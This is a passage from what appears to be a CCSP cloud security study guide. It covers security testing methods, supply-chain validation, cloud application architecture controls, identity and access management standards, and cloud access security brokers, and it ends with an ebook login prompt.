    During this stage, you simulate attacks that could exploit identified vulnerabilities from Step 5. This step helps determine the true likelihood and impact of each identified attack vector. After this step, you should have a strong understanding of your application’s attack surface (for example, what bad things could happen to which assets within your application environment).

  7. Conduct a risk and impact analysis.

    During this final stage, you take everything you’ve learned in the previous stages and refine your BIA. You also prioritize risks that need remediation and build a risk mitigation strategy to identify countermeasures for all residual risks.

Software configuration management and versioning

The final phase of the SDLC involves maintaining an application after deployment for the full lifetime of the application. A big part of ongoing software maintenance is configuration management and application versioning. Configuration management is the process of tracking and controlling configuration changes to systems and software. Versioning is the process of creating and managing multiple releases of an application, each with the same general function but incrementally improved or otherwise updated.

Configuration management is a major consideration for any development team in any environment. Ensuring that systems and applications remain properly configured and in harmony with one another is an important challenge. In cloud environments, where systems freely spin up and down and resources can be rapidly provisioned on the fly, configuration management becomes an even greater concern for developers and security professionals alike. Whereas traditional data center environments usually involve configuration updates being made directly on each server, cloud environments operate at massive scale that makes this task nearly impossible — and cloud customers typically lack the access or control to directly manage these systems anyway. Instead, in cloud environments, address configuration management by building and managing software images that are updated, tested, and deployed throughout the customer’s cloud environment. To maintain consistent configuration management and software versions, cloud developers should generally seek to use automated tools and processes.

For tracking source code changes throughout the SDLC, developers can use version-control tools like Git (https://git-scm.com) or Apache Subversion (https://subversion.apache.org). Both of these tools are open source version-control systems that are used by large and small organizations to manage their code development and releases.

A bevy of open source and commercial tools are available for maintaining system configurations and software versions. Aside from the tools and features built into most CSP offerings, developers often flock to solutions like Ansible (https://www.ansible.com), Puppet (https://puppet.com), and Chef (https://www.chef.io). These tools enable a process known as Infrastructure as Code (IaC) that allows developers to view and manipulate their IT environments directly from lines of code using a programming or configuration language. Developers can use these tools to monitor and maintain system and application configurations, which allows centralized configuration management across their entire environment.

Many other code and configuration management tools (both open source and commercial) are available, including options offered directly by some CSPs. Your organization should carefully consider your business and technical needs to determine which tool(s) work best for your software development.

Applying Cloud Software Assurance and Validation

Having a mature SDLC process is really important. Testing, auditing, and verifying that your SDLC process is producing secure applications that function as intended is just as important. In this section, you learn about functional testing and explore various application security testing methodologies.

Functional testing

Function testing is a type of software testing that evaluates individual functions, features, or components of an application rather than the complete application as a whole. Functional testing is considered black box testing and works by feeding the tested function an appropriate input and comparing the output against functional requirements. This type of testing does not evaluate the actual source code or the processing within the application, but instead is concerned only with the results of the processing. Because functional testing is used to test various aspects of an application, the types of tests are wide-ranging. Examples of some functional tests include unit testing, component testing, integration testing, regression testing, user acceptance testing, and several others.

Technical stuff Black box testing is a software testing method in which the internal design of the component being tested is not known by the tester. White box testing is the opposite method and involves granting the tester complete knowledge of the tested component’s inner workings. Black box tests are used in cases where knowledge of the internal design are not needed for testing or in situations where you seek test results that mimic those of a complete outsider. White box testing is more exhaustive and time consuming, but allows testers to expose more weaknesses because they’re given information that allows them to design tests specifically for a given application.

Functional testing within cloud environments has all of the same considerations as traditional data center environments and then some. Because you’re operating in an environment with shared responsibility (between the CSP and cloud customer), developers must perform functional testing to evaluate the application’s compliance with all legal and regulatory obligations. You must consider how multitenancy, geographic distribution, and other cloud-specific attributes impact your specific testing needs.

Security testing methodologies

Before deployment and on an ongoing basis, cloud developers should use several application security testing methodologies to find and remediate weaknesses in their applications. For the most part, the methodologies described in the following sections align with security testing practices in traditional data center environments, but practical application of each methodology may differ due to the characteristics of cloud architectures.

Static application security testing (SAST)

Static application security testing (SAST), or static code analysis, is a security testing technique that involves assessing the security of application code without executing it. SAST is a white box test that involves examining source code or application binaries to detect structural vulnerabilities within the application. SAST tools and processes can help you detect things like memory overflows that are otherwise hard for humans to detect. Because they analyze source code, your development team must be sure to find and use a SAST tool that works with your particular development environment and your application’s programming language.

Dynamic application security testing (DAST)

Dynamic application security testing (DAST), or dynamic code analysis, involves assessing the security of code during execution. DAST seeks to uncover vulnerabilities by running an application and simulating an attack against it. By examining the application’s reaction, you are able to determine whether it’s vulnerable. For cloud applications, DAST scanners run against web URLs or REST APIs and search for vulnerabilities like injections, XSS flaws, and so on. DAST scanners use applications in a similar manner as a typical user and often require application credentials in order to run.

DAST is considered a black box test because testing is performed strictly from outside the application, with no intimate knowledge of the application’s code or inner workings.

Vulnerability scanning

Vulnerability scanning is the process of assessing an application or system for known weaknesses. This process usually involves using a tool to run tests on servers, networks, or application that look for signatures that match known malware, misconfigurations, and other system vulnerabilities. Vulnerability scan tools typically generate reports that list all discovered vulnerabilities, rated by severity (for example, high, moderate, low). In cloud environments, your service category (IaaS, PaaS, or SaaS) impacts what your responsibility for scanning is. For all service categories, the CSP is responsible for scanning (and patching) the underlying cloud infrastructure. For IaaS deployments, customers are typically responsible for vulnerability scanning their virtual machine instances and database instances. SaaS customers generally leave the vulnerability management activities up to their cloud provider, while PaaS customers’ responsibilities vary based on the types of PaaS services in use. You should consult your CSP’s customer responsibility matrix, user guide, or other relevant documentation to determine what responsibility you have for conducting vulnerability scans.

Penetration testing

Penetration testing (or pentesting) is the process of conducting a simulated attack on a system or application in order to discover exploitable vulnerabilities. A pentest may be a white box test, but is usually a black box exercise during which the tester uses tools and procedures similar to those of a malicious attacker. The objective of a penetration test is for the good guys to discover exploitable vulnerabilities before the bad guys do. In doing so, pen tests provide insights into high risk security flaws within an application, and highlight the potential impact of those flaws being taken advantage of.

Warning Please do not confuse vulnerability scans with penetration tests; I’ve seen this done, and it’s a big red flag for me whenever a security professional uses them interchangeably. Vulnerability scans are generally automated, whereas penetration tests are manually performed by a security professional with expertise in conducting cyber attacks. Conducting a vulnerability scan requires you to use your selected scanning tool to search your application for vulnerabilities. Vulnerability scanning is typically an early part of conducting a penetration test, but the pen test takes it further by actually trying to exploit the discovered vulnerabilities to determine how much damage can be done; a pentester will try to steal data, shut off services, and more.

Using Verified Secure Software

A key aspect of software development is understanding your development environment and the components that make up your software application. Using verified secure software is critical in any environment, but even more important in cloud environments that are often comprised of or connected with many different components that are not completely within your control. In this section, you explore the use of approved APIs, management of your cloud development supply chain, and the benefits and risks associated with open source software.

Approved Application Programming Interfaces (API)

In cloud computing, APIs are powerful mechanisms by which cloud providers expose functionality to developers. APIs provide cloud developers an interface they can use to programmatically access and control cloud services and resources. With great power comes great responsibility, and APIs are a great example of that. The security of APIs plays a big role in the overall security of cloud environments and their applications. Consuming or leveraging unapproved APIs can lead to insecure applications and compromised data.

As a CCSP, you must ensure that your organization builds a formal process for testing and approving all APIs prior to use. Any significant changes to an API, whether vendor updates or security vulnerabilities, should prompt additional review of the API before further use. API testing should ensure that the API is secured appropriately depending upon the type of API it is. Testing an API’s security includes ensuring that the REST or SOAP API uses secure access methods, enables sufficient logging, and encrypts communications where applicable.

Supply-chain management

It is increasingly common for companies to integrate pieces of code or entire applications from other organizations into their own applications. Cloud applications, in particular, tend to be composed of multiple different external components and API calls. They often leverage software or data sources from one or more cloud provider as well as other external sources. It is essential that organizations consider the security implications whenever they use software components outside of their organizational control.

In many cases, developers rely on third-party software components that they don’t have complete understanding of; they may need the functionality that an external component offers, but haven’t validated that the component has been securely developed and tested in accordance with the organization’s policies and requirements. It is critical that your organization assess all external services, applications, and components to validate their secure design and proper functioning before integrating into your own applications.

Third-party software management

While supply-chain management is focused on securely managing your use of third-party applications, you should also assess your organization’s use of third parties to manage parts of your software. Examples include third-party patch management, third-party encryption software, and third-party access management solutions. Third-party software management goes both ways: You must carefully assess your organization’s implementation of external software and also perform due diligence on your use of third-party providers who help manage your own software, including cloud providers.

Validated open source software

Open source software is widely used by individuals and organizations alike. In cloud environments, developers heavily rely on open source applications, libraries, and tools to build their own software. Open source software is often considered to be more secure than closed source software because its source code is publicly available and heavily reviewed and tested by the community. Popular open source software often garner so much attention and scrutiny that security bugs are found and patched much quicker than their proprietary software peers.

Despite the popular belief that open source software offers many security benefits, some organizations (government agencies, for example) are a little more skeptical and cautious when it comes to open source software. Every organization should carefully assess any software component — open source or proprietary — and determine its suitability for application development and usage.

Comprehending the Specifics of Cloud Application Architecture

Developing cloud applications involves more than a development environment and your application code. Cloud application architecture requires supplemental security components from your cloud infrastructure and a combination of technologies like cryptography, sandboxing, and application virtualization. You can explore these concepts throughout this section.

Supplemental security components

I introduce the topic of defense-in-depth in Chapter 2, and it’s a critical theme throughout much of this book. When developing applications, it’s important not to rely solely on the application itself for security. Following a defense-in-depth approach, your application architecture should include multiple layers of security controls that protect different aspects of your applications in different ways. The additional layers of security components serve to supplement the security already built into your application development.

Firewalls

Firewalls are a core security component in both traditional IT environments and cloud infrastructures. These foundational components are traditionally physical devices located at strategic points throughout a network to limit and control the flow of traffic for security purposes. In cloud environments, however, customers aren’t able to just walk into a CSP’s data center and install their own firewalls. As such, cloud customers rely on virtual firewalls to manage traffic to, from, and within their networks and applications. Most CSPs offer virtualized firewall functionality, and many vendors of traditional firewall appliances now produce software-based firewalls for cloud environments. These virtual firewalls can be used with any cloud service model (IaaS, PaaS, or SaaS) and can be managed by the customer, CSP, or a third party.

Web application firewalls (WAFs)

A web application firewall (WAF) is a security appliance or application that monitors and filters HTTP traffic to and from a web application. Unlike regular firewalls, WAFs are layer-7 devices that are actually able to understand and inspect HTTP traffic and can be used to apply rules to communication between clients and the application server. WAFs are typically used to protect against XSS, SQL injection, and other application vulnerabilities listed in the OWASP Top 10 (discussed in the “Common vulnerabilities during development” section of this chapter).

WAFs are highly configurable, and their rules must be carefully developed to fit your specific application and use-case; an overly sensitive WAF can lead to inadvertent Denial of Service, while weak WAF rules may not filter bad traffic. Cloud security professionals and application developers must work together to ensure that WAF rules are configured for security without loss of functionality.

Malware and threat protection

Malware protection dates back to the earliest days of the Internet when every business and personal computer needed a good antivirus program to keep it safe from the latest Trojan horse or backdoor virus. Things have evolved quite a bit since then, but the fundamental purpose of malware protection remains the same. In modern computing, malware protection is often coupled with threat intelligence and protection. Together, malware and threat protection help intelligently discover zero day vulnerabilities and other threats to cloud applications before they become exploited. A good malware and threat protection solution correlates your cloud environment’s existing log infrastructure with other data sources, including externally provided threat intelligence. In doing so, these solutions help organizations proactively identify high-risk users, actions, and configurations that could lead to data loss or compromise if undetected. Companies like Palo Alto Networks, NortonLifeLock (formerly Symantec), and others offer malware and threat protection solutions for cloud-based applications.

Technical stuff A zero day vulnerability is a security flaw that is so new that the software developer has yet to create a patch to fix it.

Cryptography

Encryption is a central component of every cloud security strategy, as you read throughout this book. In cloud application architectures, encryption plays a huge role in securing data at rest and data in transit.

Application encryption at rest involves encrypting sensitive data at the file/object, database, volume, or entire instance level. Encryption at the file/object or database level allows customers to encrypt only their most sensitive information or data that has specific regulatory requirements around encryption. Volume encryption is similar to disk encryption in noncloud environments and involves encrypting the entire volume (or drive) and all of its contents. Instance encryption protects the entire virtual machine, its volumes, and all of its data; instance encryption protects all of an application’s data, both at runtime and when the instance is at rest on disk.

Encryption in transit typically involves either TLS or VPN technologies; both are discussed in Chapter 2. TLS encrypts traffic within an application and between an application server and a client’s browser. Using TLS helps maintain the confidentiality and integrity of data as it moves across a network. A VPN creates a secure network tunnel between the client and the application, effectively bringing the client’s machine into the trusted boundary of the application. VPNs may use the TLS protocol, but take security a step further by creating a private channel for all communications rather than merely encrypting individual data components.

Sandboxing

Sandboxing is the process of isolating an application from other applications and resources by placing it in a separate environment (the sandbox). By isolating the application, errors or security vulnerabilities in that application are also isolated within the sandbox, thus protecting the rest of the environment from harm. Sandboxes can either mirror the full production environment or be limited to a stripped-down set of resources and are commonly used to run untrusted (or untested) code and applications in a safe manner. Sandboxing is tremendously important in cloud environments, where customers don’t have the ability to physically separate resources.

Tip As you may imagine, virtual machines serve as a great mechanism for cloud customers to create sandboxes. Just be mindful that your virtual firewalls, access controls, and other configuration settings appropriately isolate traffic from your sandbox VM to the rest of your environment.

Application virtualization and orchestration

Application virtualization and orchestration are key concepts that center around bundling and using application components, but with different purposes.

Application virtualization

Application virtualization is the process of encapsulating (or bundling) an application into a self-contained package that is isolated from the underlying operating system on which it is executed. This form of sandboxing allows the application to run on a system without needing to be installed on that system, which enables running the target application on virtually any system — even ones with operating systems that the application wasn’t built to run on. From the user’s perspective, the application works just as if it were running on its native OS, much like hypervisors trick virtual machines into thinking they’re running directly on hardware.

Application virtualization benefits cloud users by providing the ability to test applications in a known environment without posing risk to the rest of the environment. In addition, application virtualization allows applications to run in environments that they couldn’t function in natively — for example running Windows applications in Mac, or vice versa. Another notable benefit to cloud customers is that application virtualization uses fewer resources than virtual machines, as only the bare minimum resources needed to operate the application are bundled in the virtualized application.

It should come as no surprise that where there are benefits, there are also drawbacks or things to consider. Developers should be aware that applications that require heavy integration with the OS or underlying hardware are not suitable for virtualization. Additionally, application virtualization adds considerable software licensing challenges — both the virtualized application and its host system must be correctly licensed.

Application orchestration

Application (or service) orchestration is the process of bundling and integrating two or more applications or services to automate a process. Orchestration involves configuring, managing, and coordinating a workflow between multiple systems and software components in an automated fashion. The objective of orchestration is to use automation to align your technology stack with a particular set of business needs or requirements. By automating the configuration and management of disparate applications and services, orchestration allows organizations to spend less time managing important, yet time intensive tasks.

Remember Orchestration may sound like it’s simply the same as automation, but the terms are not synonymous. Automation generally refers to a single task, whereas orchestration is how you automate an entire workflow that involves several tasks across multiple applications and systems.

Orchestration can be used to automate many different processes. In cloud, orchestration can be used to provision resources, create virtual machines, and several other tasks and workflows. Several CSPs offer cloud orchestration services, with AWS CloudFormation being among the most popular.

Designing Appropriate Identity and Access Management (IAM) Solutions

Managing and controlling access to your application and its data is front and center when it comes to application security. Identity and access management (IAM) solutions help you uniquely identify users, assign appropriate permissions to those users, and grant or deny access to those users, based on their permissions. Several components make up an IAM solution. I introduce the foundations of identification, authentication, and authorization in Chapter 5. In this section, you explore these topics further.

Federated identity

The concept of identity federation (discussed in Chapter 5) is pivotal in cloud environments, where customers often manage user identities across multiple systems (on-prem and cloud-based). Federated identity means that a user’s (or system’s) identity on one system is linked with their identity on one or more other systems. A federated identity system allows reciprocal trust access across unrelated systems and between separate organizations.

Federated identity management is enabled by having a common set of policies, standards, and specifications that member organizations share. This common understanding forms the basis for the reciprocal trust between each organization and establishes mutually agreed-upon protocols for each organization to communicate with one another. Organizations use multiple common standards (or data formats) to meet their federated identity goals. SAML, OAuth, and OpenID are the most common, and are discussed in the following sections.

Security Assertion Markup Language (SAML)

Security Assertion Markup Language, or SAML, is an XML-based open standard used to share authentication and authorization information between identity providers and service providers. In short, SAML is a markup language (that’s the ML) used to make security assertions (there’s the SA) about a party’s identity and access permissions. In a federated system, the service provider (or the application being accessed) redirects the user’s access request to an identity provider. The identity provider then sends SAML assertions to the service provider that includes all information needed for the service provider to identify and authorize the user’s access.

SAML is managed by a global nonprofit consortium known as OASIS (or the Organization for the Advancement of Structured Information Standards), which adopted SAML 2.0 in 2005.

OAuth

OAuth is an open standard that applications can use to provide clients with secure access delegation. In other words, OAuth works over HTTPS (secure) and issues access tokens rather than using credentials (like username and password) to authorize applications, devices, APIs, and so on. You might see OAuth in action with applications like Google or Facebook, which use OAuth to allow you to share certain information about your account with third parties without sharing your credentials with that third party.

OAuth 2.0 was released in 2012 and is the latest version of the OAuth framework. It’s important to note that OAuth 1.0 and OAuth 2.0 are completely different, cannot be used together, and do not share backwards compatibility.

OpenID

OpenID is an open standard and a decentralized authentication protocol that allows users to authenticate to participating applications (known as relying parties). OpenID allows users to log in to multiple separate web applications using just one set of credentials. Those credentials may be username and password, smart cards, or other forms of authentication. Relying parties that participate in the OpenID community thus are able to manage user identification and authorization without operating their own IAM systems.

Cloud developers can leverage the OpenID standard as a free identification and authentication mechanism for their applications. In doing so, developers allow users of their application to sign in using an existing account and credentials.

The OpenID Foundation is a nonprofit standards development organization that oversees and promotes the OpenID framework. The most recent OpenID standard is OpenID 2.0, which was published in 2007.

Identity providers

In a federated system, an identity provider is a trusted third-party organization that stores user identities and authenticates your credentials to prove your identity to other services and applications. If you’ve ever visited a retail website and been prompted to “Sign in with Facebook,” then you have seen a real-life identity provider in action. In this example, Facebook serves as the online store’s trusted identity provider and uses your Facebook account info to authenticate you on behalf of that retailer. Instead of Facebook passing your account info to the retailer, it uses your verified Facebook credentials to tell the retailer that you are who you say you are. This verification saves you the trouble of creating a new account just to buy that pair of jeans and saves the retailer the trouble of storing and securing your account information; everybody wins!

Tons of identity providers work on-prem and in the cloud. Some popular identity providers include (in no particular order)

  • Ping Identity
  • Okta Identity Management
  • OneLogin
  • Google Cloud Identity
  • Azure Active Directory
  • AWS IAM

Using a trusted identity provider can offer a lot of security benefits. Not only does it offload the need for your application to manage user identities, but it also provides a centralized audit trail for all access to your application; reliable identity providers keep historical record of all access events, which is a major benefit when demonstrating compliance with various regulatory requirements. In addition, a good identity provider provides robust security around its identity management systems, allowing your development team to focus more on creating great applications and less on foundational access security. Whether your organization uses an identity provider or manages identities internally, it’s important that you give strong consideration to application identity management as part of your cloud security strategy.

Single sign-on (SSO)

Single sign-on, commonly referred to as SSO, is an access control property that allows a single user authentication to be used to sign on to multiple separate, but related applications. SSO allows a user to authenticate a single time to a centralized identity provider and then use tokens from that authentication to access other applications and systems without repeatedly signing in.

Remember SSO sounds a lot like federated identity — and while they’re related concepts, they are not the same! SSO enables a single authentication to allow access to multiple systems within a single organization. Federated identity extends this principle by enabling a single set of credentials to allow access to multiple systems across multiple different organizations; with federated identity, you may have to enter your credentials more than once, but it will be the same set of credentials across all participating systems. Both SSO and federated identity function by using identity tokens, but federated identity relies heavily on the principle of mutual trust between separate organizations.

In the bad old days of the early Internet, it was common for organizations to require users to manage separate accounts for their desktops, email accounts, time-keeping systems, and so on. In many cases, each system would have different password complexity or password rotation requirements. This system not only wasted users’ time, but also led to forgotten passwords — and even worse, written down passwords! SSO is a saving grace for users and help desks alike.

Google applications are a great demonstration of SSO in action. When you sign in to your Google account, you’re able to access Gmail, Drive, YouTube, and all other Google services, without having to sign in again and again. Google apps are a pure example of single sign-on.

Multifactor authentication

Multifactor authentication (MFA) is an authentication method requiring a user to present two or more factors (which are forms of evidence) to the authentication mechanism; the factors can come in the form of knowledge, possession, or inherence.

  • Knowledge is something you know. This factor almost always comes in the form of a password or PIN. It should not be something that is easily guessed or researched, such as the user’s birthdate.
  • Possession is something you physically have with you. It can come in the form of a mobile phone with an authentication app installed, an RFID badge, RSA token with rotating code, or another tangible asset that can verify a user’s identity.
  • Inherence is something you, and only you, are. Think of biometric methods like fingerprints, retina scans, voice recognition, or anything else that uniquely physically identifies you.
  • (Bonus) Location is the user’s physical location. As devices and applications continue to become more location-aware, a user’s physical location is increasingly being used as a fourth potential factor for authentication.

Remember The term multifactor specifically requires that multiple factors be used for authentication. Use of two things you know (like two passwords), for example, is not MFA and is not more secure. The security benefit of MFA comes from the fact that each factor has a separate attack vector. Make sure that you remember that you must have at least two separate types of factors in place for your implementation to be considered multifactor.

Two-factor (2FA) is the standard application of MFA and should really be the standard access method for sensitive systems and applications, as well as all privileged access. Most cloud providers and many third-party access management platforms support 2FA. In addition to passwords, they usually require “something you have,” such as

  • SMS message to a mobile device: For this method, the target application sends the user an SMS with a numerical code; the user then inputs that code into the target application. This method is probably the oldest on this list, and it is gradually being phased out due to the ease with which SMS can be intercepted.
  • Software one-time password (OTP): This method involves using a mobile application like Google Authenticator and initially configuring it with a secret key. The secret key configures the app to generate a one-time password that changes every few seconds based on the algorithm in the secret key; the algorithm is time-synced with the target application. Whenever authenticating to the target application, you use this software-based OTP as a second factor. Thanks to the time-sync, the target application is able to associate the OTP with your mobile device (and your identity).
  • Hardware device: This method involves carrying and using a physical device that generates a rotating one-time password.

Cloud access security broker (CASB)

There was a time not long ago when popular belief was that the cloud was inherently insecure. That belief has mostly been dispelled, as mature CSPs have demonstrated an ability to secure systems and data better than many other organizations. The one issue that continues to haunt security professionals, including those in cloud security, is user error. Enter the CASB! A cloud access security broker, or CASB (pronounced kaz-bee), is a software application that sits between cloud users and cloud services and applications, while actively monitoring all cloud usage and implementing centralized controls to enforce security (see Figure 6-2). A CASB may be used to mitigate high-risk security events or to prevent such events altogether by enforcing security policies, stopping malware, and alerting security teams of potential security events.

A cloud access security broker, or CASB - a software application that sits between cloud users and cloud services and applications, while actively monitoring all cloud usage and implementing centralized controls to enforce security.

FIGURE 6-2: Cloud access security broker (CASB).

A CASB can serve many purposes, but at a minimum, a CASB has four pillars:

  • Visibility: Provide visibility into an organization’s cloud usage, including who uses which cloud applications and from what devices. CABSs also enforce BYOD policies and can help detect, monitor, and secure Shadow IT.
  • Data security: Monitor the security of data owned and operated by the organization. CASBs can help prevent data exfiltration through cloud services and can enforce specific security policies based on the user, data, or activity.
  • Threat protection: By providing a comprehensive view of cloud usage, CASBs can help guard against insider threats, both malicious and accidental.
  • Compliance: Help organizations demonstrate compliance with regulatory requirements like HIPAA, PCI DSS, and GDPR.

From a security perspective, most CASBs are able to enforce policies related to authentication and authorization (including SSO), logging, encryption, malware prevention, and more.

The CASB market has exploded in recent years. Some popular names in the space include

  • Cisco Cloudlock
  • Netskope
  • Bitglass
  • Proofpoint
  • Forcepoint CASB
  • Oracle CASB
  • McAfee MVISION Cloud

The three primary types of CASB solutions are

  • Forward proxy: This type of CASB sits close to the user (like on their desktop or mobile phone) and uses an encrypted man-in-the-middle technique to securely inspect and forward all cloud traffic for the user. This type of CASB requires you to install certificates on every single device that needs to be monitored, making it challenging to deploy in large distributed organizations.
  • Reverse proxy: This type of CASB sits close to the CSP and integrates into identity services like Okta or OneLogin to force user’s traffic through the CASB for inline monitoring. This type eliminates the need to individually install certificates on user devices, but reverse proxy CASBs are not compatible with client-server applications that have hardcoded hostnames.
  • API-based: This type of CASB allows organizations to enable CASB protection to any user on any device from any location. API-based CASBs monitor data within the cloud itself, rather than on a proxy at the perimeter. There’s no need to install anything on user devices, and it’s also much more performance-friendly than both proxy-based methods. A major limitation, however, is that not all cloud applications provide API support.
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.141.193.158